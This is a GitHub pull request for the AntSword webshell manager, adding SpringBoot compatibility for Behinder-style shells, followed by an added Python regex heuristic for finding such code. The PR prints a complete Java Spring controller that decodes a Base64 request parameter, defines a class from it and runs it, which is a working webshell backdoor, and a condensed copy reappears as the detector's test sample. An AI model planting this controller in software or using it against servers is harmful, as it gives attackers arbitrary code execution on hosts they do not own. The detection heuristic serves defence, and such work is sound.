SpringBoot compatibility #1

Merged
merged 3 commits into from Oct 3, 2020

fupinglee
Contributor

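When using AntSword to connect to a Behinder shell in a SpringBoot environment, the connection reports that the class cannot be found, because javax.servlet.jsp.PageContext is not present.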

import org.apache.shiro.codec.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

@Controller
@RequestMapping({"/bxcc"})
public class BxController extends ClassLoader{

    public BxController(){

    }
    public BxController(ClassLoader c){
        super(c);
    }

    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }

    @RequestMapping(value = "/index")
    public void index(HttpServletRequest request, HttpServletResponse response) {

        String bstr = request.getParameter("ant");

        try {
            if(bstr!=null){
                new BxController(this.getClass().getClassLoader()).g(Base64.decode(bstr)).newInstance().equals(response);
            }
        }catch (Exception e){

            e.printStackTrace();
        }
    }


}


Using Class.forName avoids this situation. The main modified code is as follows:

try{
    if(Class.forName("javax.servlet.jsp.PageContext").isInstance(obj)){
        Class clazz = Class.forName("javax.servlet.jsp.PageContext");
        request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj);
        response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj);
    }
}catch (ClassNotFoundException | NoSuchMethodException pageContextErrorExection) {
    if (obj instanceof HttpServletRequest) {
        ...

    } else if (obj instanceof HttpServletResponse) {
        ...
    }
}catch (Exception e) {
    e.printStackTrace();
}


@yzddmr6
Member

yzddmr6 commented Oct 3, 2020

There is a small problem with the logic: when pageContext is available and a request or response is passed into equals, the flow never reaches the catch block. I'll fix it today.

@yzddmr6 yzddmr6 merged commit 8399919 into AntSwordProject:master Oct 3, 2020
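
For defenders reviewing a Spring code base, the controller in the pull request description has a recognisable shape: a web handler that feeds request data into `defineClass` and instantiates the result. The following source-scanning heuristic is an added example, not code from this PR or from the AntSword project; the indicator names, regular expressions and both sample inputs are constructed for illustration.

```python
import re

# Indicator names and patterns are this example's own, derived from the
# controller quoted in the PR description (defineClass fed from a request).
INDICATORS = {
    "extends_classloader": re.compile(r"\bclass\s+\w+\s+extends\s+(?:\w+\.)*ClassLoader\b"),
    "define_class": re.compile(r"\bdefineClass\s*\("),
    "request_input": re.compile(r"\.\s*get(?:Parameter|InputStream|Reader)\s*\("),
    "decode": re.compile(r"\bBase64\b[\w.()\s]*?\.\s*decode\w*\s*\("),
    "instantiate": re.compile(r"\.\s*newInstance\s*\("),
    "web_handler": re.compile(r"@(?:Request|Get|Post)Mapping\b|\bextends\s+HttpServlet\b"),
}
# Crude comment stripper so commented-out text does not count as a hit.
COMMENTS = re.compile(r"/\*.*?\*/|//[^\n]*", re.DOTALL)

def indicators(java_source):
    """Return the sorted names of all indicators present in the source."""
    code = COMMENTS.sub("", java_source)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(code))

def is_suspicious(java_source):
    """Flag only the combination: bytes become a class, input comes from a
    request, and the class is instantiated. Each alone is common and benign."""
    return {"define_class", "request_input", "instantiate"} <= set(indicators(java_source))

# Constructed sample condensed from the controller shown in the PR description.
SAMPLE_LOADER = '''
@Controller
public class BxController extends ClassLoader {
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
    @RequestMapping(value = "/index")
    public void index(HttpServletRequest request, HttpServletResponse response) throws Exception {
        String bstr = request.getParameter("ant");
        new BxController(this.getClass().getClassLoader()).g(Base64.decode(bstr)).newInstance().equals(response);
    }
}
'''
# Constructed benign controller: reads a parameter but never defines a class.
SAMPLE_BENIGN = '''
@RestController
public class GreetingController {
    // defineClass( is only mentioned in this comment
    @GetMapping("/hello")
    public String hello(HttpServletRequest request) { return "hello " + request.getParameter("name"); }
}
'''

if __name__ == "__main__":
    for name, src in (("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious(src), indicators(src))
```

A text match like this is a triage signal for code review or a repository sweep; a hit still needs a human to read the handler, and reflection or string splitting will evade it.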